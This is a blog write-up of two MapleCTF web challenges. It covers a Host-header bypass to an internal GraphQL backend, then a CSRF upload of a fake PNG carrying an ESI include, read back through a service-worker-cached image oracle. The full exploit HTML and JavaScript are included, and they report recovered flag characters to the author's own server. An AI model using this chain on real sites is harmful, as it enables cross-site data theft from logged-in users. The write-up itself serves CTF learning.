@@ -11,6 +11,6 @@
             proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
             proxy_set_header X-Forwarded-Proto https;
             proxy_set_header X-Forwarded-Port 443;
-            proxy_set_header Host $host;
+            proxy_set_header Host "jjk_app";
         }
-}
\ No newline at end of file
+}


This seems like a pretty clear hint that the solution to version 1 has something to do with the host header. It is the only thing of consequence that was modified.

There's pretty much only one thing you can do with a host header - change it. But what should we change it to?

Looking at the varnish config file, we see:

[..]

sub vcl_recv {
    if (req.http.host ~ "jjk_db" && std.ip(client.ip, "17.17.17.17") ~ internal) {
        set req.backend_hint = db_backend;
    } else {
        set req.backend_hint = app_backend;
    }
}

So basically, there are two backends varnish can connect to depending on the host header. The IP ACL check may look concerning at first. However this check should be checking the X-Real-IP or X-Forwarded-For header, instead of the actual IP. The actual IP would be the nginx load balancer IP, which is always internal. Hence this check is ineffective.

In any case, clearly the other possible value for the host header is "jjk_db". Given we have strong suspicions something is wrong with how host headers are handled, it seems natural to try this other value.

Sure enough, if we set the host header to "jjk_db", we end up being connected directly to the GraphQL backend, and can query the flag.

$ curl -g 'https://jujutsu-kaisen.ctf.maplebacon.org/?query={getCharacters{edges{node{notes}}}}' --header 'Host: jjk_db'

which gave us the flag.

The second challenge

Without the diff providing a hint as to where to look, we are going to have to go over the challenge in much more detail.

Usually when doing a CTF challenge, the first thing I do is look for the stuff that is out of place. Often challenges are written to use fairly standard tech choices for most of it, and then do something weird just for the vulnerable part. A good first step is to imagine you have been asked to do code review on the app. What parts would you flag as "needs improvement" or otherwise don't make sense? Those parts are usually key to solving the problem.

The first thing that stands out to me like a sore thumb is the varnish config.

Here is the full default.vcl

vcl 4.1;
import std;

backend app_backend {
    .host = "jjk_app";
    .port = "9080";   
}

backend db_backend {
    .host = "jjk_db";
    .port = "9090";   
}

acl internal {
    "localhost";
    "192.168.0.0/16";
    "172.0.0.0/8";
}

sub vcl_backend_response {
    set beresp.do_esi = true;
}

sub vcl_recv {
    if (req.http.host ~ "jjk_db" && std.ip(client.ip, "17.17.17.17") ~ internal) {
        set req.backend_hint = db_backend;
    } else {
        set req.backend_hint = app_backend;
    }
}

Additionally, if we look in docker-compose.yml, we see that varnish is started with an unusual command line argument: -p feature=+esi_disable_xml_check 

All this sticks out for a number of reasons:

  • It would be kind of unusual in general for a CTF challenge to have varnish caching if it wasn't part of the solution to the problem
    • Especially because load balancing is already being handled by nginx
    • Especially because it is mostly configured not to cache anything (Some static assets and 404 pages do get cached, but nothing that would be expensive to generate)
  • It is weird how jjk_db is configured as a backend, despite the fact that jjk_app does not route through varnish but instead contacts jjk_db directly
  • ESI while not totally unheard of, is somewhat of an obscure technology. Obscure technology choices should always raise eyebrows during CTFs.
    • More importantly, the challenge does not actually use ESI to render anything. So why is it explicitly enabled?
  • The custom command line argument is especially eyebrow raising. It is disabling a check for a technology that is not even used in the challenge. That sounds like it will be needed for the solution.

What is ESI?

It seems that there are a lot of hints here that ESI (Edge-side includes) is going to be important to this problem. So what is it?

ESI is a technology to allow CDN cache servers (e.g. varnish) to construct a page from multiple parts. You might want to use it if you want to cache different parts of your page for different times, or combine the results of different services into one page.

In essence, if you put <esi:include src="http://host/something.htm"/> in a page, the cdn server will substitute that url into the page at that point.

This should get our security spidey-senses going - it seems a bit like an SSRF. If we can sneak an ESI tag into the page, we can perhaps fetch the results of some page we are not normally allowed to access.

There is a big restriction though - in the varnish implementation you can only request urls that the varnish server is able to handle. You cannot request arbitrary urls from the internet.

What about the -p feature=+esi_disable_xml_check? I hadn't heard of this before, but a quick look at the official docs reveal that it makes varnish process ESI on all responses. By default ESI if enabled would only process responses that look like HTML (start with a <). With this feature enabled, other responses, including images, get processed too. The importance of this will soon become apparent.

The rest of the App

The varnish config sticks out the most, but what else sticks out in this challenge? The most obvious is the existence of a report bot. This indicates that the challenge will have some sort of client-side component. But what type of client-side attack? Normally my go to thought would be XSS since that is the most common type of client-side vuln, but there is another big hint in the jjk_app that indicates that this is more likely a CSRF challenge:

From app/app.py

app.config.update(
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True, # default flask behavior just does this
    SESSION_COOKIE_SAMESITE='None',
)

Setting SESSION_COOKIE_SAMESITE='None' clearly sticks out here. It should always stick out in a CTF challenge when a secure default is changed to something less secure.

Making cookies be SameSite="none" tells browsers to disable CSRF mitigations, and allow cookies to be sent on cross-site requests. This is a sure sign that CSRF is part of problem. Additionally, the challenge does not have any CSRF tokens, the traditional way to prevent CSRF from before SameSite cookies were a thing.

Interaction points

Once I have identified the things that are weird, my next step is to usually try and identify places in the app where interactions happen. Security vulns usually happens at the boundries between systems or between systems and users, so it is good to have a sense of where these are.

In this app we have (excluding entirely static endpoints):

  • A login page (but no credentials)
  • An api endpoint to view the list of characters as json, including flag, but no way to access it as it is behind login. Behind the scenes this makes a GraphQL query to jjk_db and displays the results. [This ends up being totally useless, but seems tantalizing at first glance]
  • A /newchar API endpoint (behind auth), that allows us to submit a new character to the DB. However the part that actually modifies the DB is commented out, so the only thing we can do is upload a PNG file of the new character. Upoon success, this endpoint will redirect your POST request to the location of the newly uploaded file. This is the only write endpoint in the app
    • File uploads are usually a security sensitive spot, so i spent some time looking through the upload code, but it all looked very secure to me. It does not care if the PNG file is valid, but there is no way to upload something with the wrong extension/content-type.

The challenge also provides a report bot. The report bot logs into the app (and thus getting cookies) and then goes to a URL provided by us. Given we already identified as CSRF being the likely issue due to disabling SameSite cookies, and there is only one write endpoint, this suggests that the attack involves a CSRF attack against the image upload newchar api as there are no other entry-points to attack.

Putting together a plan of attack

Based on the things that stood out while reading through the code, the pieces start to come together and a rough plan of attack unfolds:

  • Use CSRF to upload a "PNG" file cross-domain
  • Put ESI directives in the PNG file to query the GraphQL endpoint to retrieve the flag and insert it into the PNG file
  • Somehow retrieve the PNG file to get the flag (???)
  • Profit!

The third step, extracting the PNG file, is the hard part of this challenge. Lets put that aside for the moment, and talk about the first two steps first. The easiest step is making a PNG file with an ESI directive in it, so lets start there.

PNG file with ESI directives

This is pretty easy. The code does not care if the PNG file is valid, so we can just create a file containing:

<esi:include src="http://jjk_db/?query={getCharacters{edges{node{notes}}}}"/>

Name it something ending in .png, and we are good to go. To test this, i ran the app locally (docker-compose up). Since this is local, i know the username and password are "placeholder". To test, i simply navigated to https://localhost/newchar and filled out the form with the image (GET to this endpoint shows a form, POST does the upload).

When i first did this, it didn't work. I had forgotten the ending /. Varnish's ESI implementation requires the tag to be self-closing or it ignores it. To debug this, i did docker-compose exec varnish varnishlog which gives detailed debug logs of varnish's processing including ESI error messages. varnishlog and varnishncsa (basically the varnish access log) commands were quite helpful during debugging.

Once we hit submit on the form, we a redirected to the now uploaded image. Since we didn't make a real image, firefox shows it as broken, but if we download the image and open it in a text editor, we see the flag is present.

This feels like a promising step. We uploaded a file, which when retrieved has the flag in it. However we still have some ways to go. We were only able to upload because this is the local instance we know the password to. In the real challenge we must upload from having the report bot navigate to our website, so we have to find a way to do this cross-domain. We also need some way to obtain the PNG afterwards, again cross-domain despite the same origin poicy.

Uploading cross domain with CSRF

In the real challenge we cannot upload directly to the site, because it is behind a password we do not know.

We do have the report bot. We can send urls for the report bot to visit, which it does after logging in. This is what the bot looks like:
 
        await loginPage.goto(`${CHALL_DOMAIN}/login`, {
            waitUntil: 'networkidle2',
            timeout: 2 * 1000,
        });
        await loginPage.type('#username', ADMIN_USERNAME);
        await loginPage.type('#password', ADMIN_PASSWORD);
        await loginPage.evaluate(() => {
            document.querySelector("#submit-login").click();
        });
        await loginPage.waitForNavigation({
            waitUntil: 'networkidle2',
            timeout: 2 * 1000,
        });

        const resp = await page.goto(url, {
            waitUntil: 'load',
            timeout: 3 * 1000,
        });

The "url" variable is the url we submit. Luckily for us, this challenge sets SameSite=None on all cookies as previously mentioned. Additionally the write endpoints are not protected with CSRF tokens. This means any requests to the challenge domain, including cross domain ones, will have the appropriate cookies and be logged in.

Many people assume that the web browser same origin policy prevents all communication between separate domains on the web unless relaxed via CORS. This is not true. If the same origin policy was a file permission, it would be -WX (write & execute). You can write (POST) content to other domains, for example via form submission or AJAX. You just cannot read the results. Similarly you can execute, i.e. load javascript or CSS from other domains. The only thing it prevents is javascript from reading cross-domain content. You can even display cross-domain content, for example in <img> tags, as long as javascript does not have access to it (This is important later).

With that in mind, there's two ways we can upload cross domain. We can simply make an html form submitted via JS:
 
<form id="myform" action="https://jujutsu-kaisen-2.ctf.maplebacon.org/newchar" method="POST" enctype="multipart/form-data">
   <input type="file" id="file" name="file" value="Upload Image">
   <input type="submit">
</form>
<script>
  var b64 = "base64 encoded PNG file here";
  var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0))
  var f = new File([bytes], "a.png", { type: 'image/png' });
  var dataTransfer = new DataTransfer();
  dataTransfer.items.add(f);
  document.getElementById( 'file' ).files = dataTransfer.files;
  document.getElementById( 'myform' ).submit();
</script>
 
Alternatively, you can use AJAX:
 
  /* Make sure we upload this as a "file" not normal POST parameter */
  var b64 = "base64 encoded PNG file here";
  var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0))
  var f = new File([bytes], "a.png", { type: 'image/png' });
  var form = new FormData();
  form.append( 'file', f );
 
  fetch( "https://jujutsu-kaisen-2.ctf.maplebacon.org/", {
    mode: 'no-cors' /* Do not use CORS, since we are not authorized under cors. This causes the result to be opaque. */
    credentials: 'include', /* include the login cookies that the bot got when logging in so this request is logged in as Admin, despite not knowing the admin's password. */
    body: form, /* This automatically changes the Content-Type header */
    method: 'POST'
  } ).then( result => { /* result is opaque */ } );
 
 
In both cases, the result of the request is unusable. For the form, you navigate the page to a new domain and no longer have control over it to access to it. With AJAX, the result object returned is opaque so you cannot read the result. Nonetheless, that is one problem down, now are we need to figure out is how to read the PNG.

[Note: All this might change when chrome eventually implements storage partitioning. Firefox already does this if enhanced tracking protection is enabled]

Extracting the PNG

So this seems like a lot of progress. We can give the report bot our website, our website can upload a PNG file to the site, which when served has the flag in it.

But how do we get the flag? We cannot read the PNG file, as it is cross domain and the same origin policy prevents us.

Here's a couple things I tried that didn't work:
  • XSSI - You can load javascript & CSS cross domain. You could make the png file be something like var data = "secret stuff"; include it in your page, and then read the variables in js. The problem is that modern browsers require correct mime types if your JS or CSS is cross domain. So this would have worked in older browsers but not recent ones.
  • Cache pollution. I played with the idea of trying to use the varnish cache as a side channel to leak the data. e.g. Forcing the answer to be cached a letter at a time and then trying to retrieve it later from a different host by looking at the age header when retrieving specific urls. The problem is that varnish seems to not be configured to cache the results of backend ESI fetches, so i wasn't able to alter the cache state from ESI afaict.
  • <img> tags. Image tags have onerror and onload event handlers that distinguish between valid and invalid image files even cross domain. They also leak the width/height of the file (including 0x0 if invalid). This did not work because we do not know the url of the image, we only know we get redirected there after a POST. We can only set the img src to do a GET (However, this turns out to be not quite true, and is really important later)
  • Timing oracle - we basically have a blind DB injection. If this was SQL i would be injecting sleep(5) and checking how long the request took to load. However GraphQL doesn't support sleeps or other complex operations one could easily construct a timing oracle out of. That said, after the competition, i found out some teams did solve it this way by forcing graphQL to make a really big multi-mb response, which was slow enought to be detected. I did not think of this.
  • <object> tags. An <object> tag is like a weird combination of <img> and <iframe>. Like <img> you can distinguish between valid & invalid images using onload events. However you can also navigate them like an iframe. I spent a lot of time trying this but it ultimately did not work. More on this below

So none of these seemed to work immediately. However it did seem clear that given a PNG file, it is possible to leak cross domain whether or not the PNG file is a valid PNG file. This feels like something we could do with ESI. At this point I mistakenly thought I could use the <object> tag to leak this validity info cross domain. I was on the right track but <object> was the wrong approach. In any case I decided to create a payload that would leak the flag based on whether or not the resulting PNG is valid.

Making a PNG validity oracle

This was actually fairly easy. The goal here would be to leak the flag a byte at a time.

The graphql endpoint supports LIKE queries, so if we want to test to see if the flag starts with the letter A, we can do a query like:
{
    getCharacters( filters: {notesLike: "maple{A%"} )
    { edges {node {notes} } }
}

If one of the notes items contains the string "maple{A", the result is returned, otheriwse an empty result is returned (i.e. {"data":{"getCharacters":{"edges":[]}}}). We try this for every letter, until we get one, and then move on to the next letter, and so on.

To make this work, I first prepared a file that would contain the empty result inside it:

exiftool -Artist='{"data":{"getCharacters":{"edges":[]}}}' file.png

exiftool adds the empty result to the file's metadata.

I then opened the file in vim, found the inserted part, and replaced it with the text: <esi:include src='http://jjk_db:9090/?query={getCharacters(filters:{notesLike:"maple{XXX%25"}){edges{node{notes}}}}'/>
 
This of course makes the PNG file invalid, as it is now spilling into the next chunk rendering the hash incorrect, but that's ok. The idea would be the post-process the file, replacing XXX with whatever letters we are currently checking.
 
After the file is uploaded, varnish replaces the ESI directive. If no match is found, a GraphQL empty response is inserted, which makes the PNG file once again valid. Otherwise a longer response is inserted, which overflows the text metadata block, making the entire PNG file invalid. We now have our validity oracle. 

<object> tag

Initially I thought the <object> tag would be my best bet. Originally meant for plugins, in the modern web it acts sort of like a mix between an <img> tag and an <iframe>. When given a (non-svg) image file, it acts as an <img> tag, otheriwse it acts like an <iframe>

Like an <img> tag, it has onload & onerror event handlers (as well as leaking img dimensions). It can navigate like an iframe, but if loading an invalid <img> it won't trigger the onload handler (where an iframe will trigger onload even for invalid images). The important thing here, is onload triggers on every new valid navigation (in firefox anyways).

Thus a plan formed:
  • Create an HTML document with a <form> that uploads this png file and auto submits via javascript (See the snippet in the earlier "Uploading cross domain with CSRF" section)
  • Load this form in an <object> tag with an onload handler
  • If the onload handler triggers once, then we know we have an invalid file (And hence guessed the flag prefix correctly). If it triggers twice, then we have a valid png and our guess is wrong.

This seems great. I implemented it and tested it out locally in firefox. It Worked (Assuming enhanced tracking protection is off)!

Problem solved, right? Not so fast.

I tried submitting my script to the report bot, and it did not work. As i debugged further, I realized that the report bot is using headless chrome, where I was testing in firefox. Appearently <object> is implemented quite differently between firefox and chrome.

In chrome we only get the onload event once, not every navigation. Additionally the object tag seems to choose whether it is an <img> or an <iframe> at initialization time. In <img> mode we get the different events with valid vs invalid, it adjusts the size based on the img, and svgs are run without scripts. On the other hand, in <iframe> mode, we do not get a distinction between valid & invalid images (both trigger onload events), the size of the element does not adjust for different size raster images (oddly enough it does adjust size for SVGs) and SVGs are run with scripts enabled.

It seems like it decides what mode to be in, first by looking at the type attribute. If that's missing then it looks at the extension in the url of the data attribute. If it ends up guessing wrong and being in <img> mode for something that has a Content-Type that is not an image, it appears to change into iframe mode and restart the load (i.e. you see two loads of the resource in the network tab). All this seems to only occur when first initializing. Once it is initalized it does not appear to change mode with future navigations.

All that's to say, my plan won't work. To get the events I want I need it to be in <img> mode, but i need it to first be in <iframe> mode to do the form submission. <object> has a target attribute potentially letting you submit a form into it from the outside, but that only works in <iframe> mode. So this seems a bit like a dead end. I can have one or the other behaviour, but I actually need a mix of both behaviours.

I tried a lot of things here for a long time, and nothing was working. At some point I had the bright idea to use ServiceWorkers.

Enter service workers

ServiceWorkers are a web browser feature where the javascript on your page can essentially act as a MITM proxy, manipulating network requests for your page. Once you install the ServiceWorker javascript, it stays resident in the background, intercepts all requests to your site, and then can either let them through, cache them, or give a custom response. The idea is to allow web authors to implement custom caching schemes or offline access to their websites.

This seemed perfect for my needs. I could preload the POST form submission, and cache it. Then when I load the object tag I could make it load the cached POST submission instead of the normal behaviour of a brand new GET request being issued. Hopefully that would let me view the /newchar endpoint with <object> in img mode, and have the onload handler indicate if the image is a valid PNG.

At first I wasn't sure if you can cache a POST request in ServiceWorkers, being non-idempotent and all. Turns out it doesn't really matter, you can substitute pretty much any response for any other with ServiceWorkers. It even works for cross-domain requests (You cannot read them and there are some restrictions related to that, but you can subtitute them for each other if it is the same type of request).

However there was a problem. <object> tags in chrome do not seem to use service workers at all. Kind of weird. Generally <iframe>'s do not if they are cross-domain since that is considered a separate browsing context to a separate website and not part of your site anymore. However, object tags do not seem to use ServiceWorkers at all, even if in the same domain, and even if in image mode.

When playing with this I did notice that if there was an <img> tag already on the page for some reasource, then the <object> tag would use that as a cache if it was in img mode, even if that <img> tag was fed by a ServiceWorker. So this presented a plan:
  • Do a POST submission of the form using ajax. Make ServiceWorker cache it.
  • Load the url in an <img> tag, ensuring the ServiceWorker uses the cached response
  • Load the <object> tag, which would use the <img> tag as a source, allowing us to look at onload events.

I started implementing this, but then realized it was pretty silly. <img> tags also have onload/onerror events. There is no need to bother with the <object> tag if i can load the result of the form submission into an <img>. With that in mind i ditched the last step and just used the <img> tag.

Finally putting it altogether

So to summarize, here is where we are at:
  • Create a PNG file with an <esi:include> tag in it
  • The esi:include tag does a GraphQL query allowing us to guess one letter of the flag. If the guess is incorrect the PNG file is valid, otheriwse it become invalid.
  • Make a CSRF request to the jjk_app uploading the png file. Have the service worker cache the response
  • Load an <img> of the same url, ensuring the ServiceWorker uses the cached POST result
  • Install onload and onerror handlers to the <img> tag
  • If the onload handler is triggered the guess is incorrect and we try the next letter in the alphabet. If the onerror handler is triggered, the guess is correct. Save the letter and start guessing the next letter in the flag.
  • Once we have the flag, make an ajax request back to our server to tell us what it is.
 
The ServiceWorker code is pretty simple - if the requested url does not contain /newchar, ignore it and let the browser handle it. Otherwise, check the cache, if we have a cached entry for that url (including POST requests) use that. Otherwise we request the url from the internet, and store it in cache. When storing it, we store it just under the url and not the original Request object so we can ensure that the POST requests will match later GET requests for the same URL.
 
The end result, is if we first make an AJAX post request to the /newchar API endpoint, that will be fetched and cached. The subsequent GET request to the endpoint will be served from cache, using the result from the POST request instead of making a new GET request. This is despite the fact the method is different, the requests have different cookies and one of them includes a file upload.
 
 
Here's the code for my service worker (service-maple.js):
 
function log(a) {
    console.log(a);
    //fetch( 'https://bawolff.net/map?log=' + encodeURIComponent(a), { "mode": "no-cors" } );
}

self.addEventListener('install', event => {
    log( "Service worker installed" );
});

self.addEventListener('activate', event => {
    log( "activating service worker" );
    // Take over tabs immediately instead of waiting for next page load
    self.clients.claim();
});

// This intercepts all network loads.
self.addEventListener('fetch', event => {
    log( "ASKING for " + event.request.method + ' ' + event.request.url + ' in ' + event.request.mode + ' ' + event.request.destination );
    if ( event.request.url.indexOf( '/newchar' )  === -1 ) {
        log( "skipping " + event.request.url );
        return;
    }
    event.respondWith(
        // ignoreMethod probably not strictly needed here, since we don't save the original Request object in cache.
        caches.match(event.request, { ignoreMethod: true, ignoreVary: true }).then(cachedResponse => {
            if (cachedResponse) {
                log( "SERVING " + event.request.method + ' ' + event.request.url + " from cache" );
                // The docker image has a small space quote so delete when done.
                caches.delete( event.request.url );
                return cachedResponse;
            }

            return caches.open("mycache").then(cache => {
                // We don't have the response, so fetch it from internet.
                return fetch(event.request).then(response => {
                    // Put a copy of the response in cache. Note we save it under event.request.url
                    // instead of event.request, to ensure the fact it is a POST request was not saved.
                    return cache.put(event.request.url, response.clone()).then(() => {
                        log( "STORE_IN_CACHE " + event.request.url );
                        return response;
                    });
                }).catch( function (err) {
                    log( err );
                    // Don't want an error to take down the whole service worker, so return a dummy response.
                    return new Response(new Blob(), {status:500} );
                } );
            });
        })
    );
});
 
 
All that is left is the code that makes use of the service worker. We convert the PNG file into an array of 8-bit integers split among two variables. We put our guess in the middle. We then make the POST request, followed by loading the same url as an image. If the onload event handler is triggered from the image, we know we have a valid PNG image, and our guess of the flag is wrong, so we try the next letter in the alphabet. If the onerror handler triggers, we know the PNG file is invalid (or a network error happened, the session cookie wasn't present, or something else went wrong, etc. This can be flakey). This means our guess was correct, so we found a letter of the flag and need to move on to the next letter.
 
The resulting exploit code (maple-jjk-explot.htm) looks like this:
 
<html>
<head>
<script>

// Load the service worker.
navigator.serviceWorker.register('service3.js');

function start() {
    // Put a little delay to make sure ServiceWorker is activated
    // More proper solution would be to postMessage after activation.
    window.setTimeout( tryNext, 600 );
}

const imgStart =  [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82, 0, 0, 0, 1, 0, 0, 0, 1, 1, 3, 0, 0, 0, 37, 219, 86, 202, 0, 0, 0, 6, 80, 76, 84, 69, 0, 128, 0, 255, 255, 255, 20, 63, 47, 79, 0, 0, 0, 46, 116, 69, 88, 116, 65, 114, 116, 105, 115, 116, 0, 60, 101, 115, 105, 58, 105, 110, 99, 108, 117, 100, 101, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 106, 106, 107, 95, 100, 98, 58, 57, 48, 57, 48, 47, 63, 113, 117, 101, 114, 121, 61, 123, 103, 101, 116, 67, 104, 97, 114, 97, 99, 116, 101, 114, 115, 40, 102, 105, 108, 116, 101, 114, 115, 58, 123, 110, 111, 116, 101, 115, 76, 105, 107, 101, 58, 34, 109, 97, 112, 108, 101, 123 ];

const imgEnd = [37, 50, 53, 34, 125, 41, 123, 101, 100, 103, 101, 115, 123, 110, 111, 100, 101, 123, 110, 111, 116, 101, 115, 125, 125, 125, 125, 39, 47, 62, 30, 68, 92, 77, 0, 0, 0, 10, 73, 68, 65, 84, 8, 91, 99, 96, 0, 0, 0, 2, 0, 1, 98, 64, 79, 104, 0, 0, 0, 0, 73, 69, 78, 68, 174, 66, 96, 130, 10 ];

// Cache busting for ease of testing.
const rand = Math.random();

const urlParams = new URLSearchParams(window.location.search);
var flagGuess = urlParams.get('prefix') || '';

const urlPrefix = urlParams.get( 'url' )
// During testing use: 'https://nginx/newchar?guess='
// for the real deal use: 'https://jujutsu-kaisen-2.ctf.maplebacon.org/newchar?guess=';

var a = [ "---", "---","a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", '}' ];

var i = 0;

// Generate our image to upload.
function getFormData(url) {
    var guess = url.substring(urlPrefix.length);
    var imgMid = [];
    for (var i = 0; i < guess.length; i++ ) {
        imgMid[imgMid.length] = guess.charCodeAt(i);
    }

    var form = new FormData();
    var blob = Uint8Array.from(imgStart.concat( imgMid, imgEnd) );
    var f = new File([blob], "a.png", { type: 'image/png' });

    form.append( 'file', f );
    return form;
}

// Invalid PNG file means guess was succesful. Save and move to next letter in flag.
function onerr(e) {
    console.log("SUCCESS " + e.target.title);
    // Report back on success.
    fetch( "https://bawolff.net/map/YES/" + e.target.title + '?' + rand, { "mode": "no-cors" } );
    if ( e.target.title === '---' ) {
        // Hack, sometimes the first attempt wasn't working.
        tryNext();
        return;
    }
    flagGuess = e.target.title;
    if ( flagGuess.length < 40 ) {
        i = 0;
        tryNext();
    }
};

// PNG was invalid or first time. Try next letter in alphabet.
function tryNext(e) {
    if ( e ) {
        console.log( "failed: " +  e.target.title );
        fetch( "https://bawolff.net/map/fail/" + e.target.title, { "mode": "no-cors" } );
    }
    if ( i >= a.length ) {
        fetch( "https://bawolff.net/map/TriedAll/" + flagGuess  + '?' + rand, { "mode": "no-cors" } );
        console.log( "tried all" );
        return;
    }
    console.log( "Setting: " + flagGuess + a[i] );
    fetch( urlPrefix + flagGuess + a[i] + '&bust=' + rand, {
        mode: 'no-cors',
        credentials': 'include', /* include login cookies */
        body: getFormData( urlPrefix + flagGuess + a[i] ),
        method: 'POST'
    } ).then( result => {
        window.setTimeout( function () {

            var elm = new Image();
            elm.title = flagGuess + a[i];
            elm.onerror = onerr
            elm.onload = tryNext;
            elm.src = urlPrefix + flagGuess + a[i] + '&bust=' + rand;
            i++;

        }, 100 );
    } )
}
</script>
<body onload="start()">jjk script.
</body>
</html>
 

 
For ease of testing, the code looks at its own url to decide what the challenge url is. Because the bot may timeout before completely extracting the flag, there is also a 'prefix' parameter for the part of the flag we have already figured out so we can start again in the middle of a guess.

If testing locally in browser (pro-tip: start chromium with --ignore-certificate-errors I wasted a lot of time on cert errors), we would log into the app first and use a url like https://bawolff.net/maple-jjk-explot.htm?url=https://localhost%2Fnewchar%3Fguess%3D&prefix=

When testing with the actual challenge but locally, we use a url like:
https://bawolff.net/maple-jjk-explot.htm?url=https://nginx%2Fnewchar%3Fguess%3D&prefix=

Finally, when doing the real thing, we use a url like:

https://bawolff.net/maple3.htm?url=https%3A%2F%2Fjujutsu-kaisen-2.ctf.maplebacon.org%2Fnewchar%3Fguess%3D&prefix=

To see the answer we tail -f /var/log/apache2/access.log:

35.203.147.181 - - [01/Oct/2023:21:57:03 +0000] "GET /map/YES/tooattachedforgottolookforunintendeds%7D?0.3308756734724301 HTTP/1.1" 404 512 "https://bawolff.net/maple3.htm?url=https%3A%2F%2Fjujutsu-kaisen-2.ctf.maplebacon.org%2Fnewchar%3Fguess%3D&prefix=tooattachedforgottolookforuninten" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36"

Thus the flag is maple{tooattachedforgottolookforunintendeds}

Conclusion

I spent a lot of time working on this problem, and got it fairly close to the end of the competition with only a few hours to spare. As the hours went by I knew I was making progress but was also really worried I would not figure it out in time. Luckily I got it with only 2 hours to spare.
 
It was quite a fun problem, and tought me a lot about web browsers. I now have some truly useless knowledge about how <object> tags work in chrome and some somewhat more useful knowledge about ServiceWorkers, which is a really cool javascript API I wasn't very familiar with previously.

Thank you to the event organizers Maple Bacon for providing a great event.

addendum: This write up came top 5 for the MapleCTF write-up competition. I've never been in the top 5 for a write-up competition before, just wanted to say thank you to everyone :)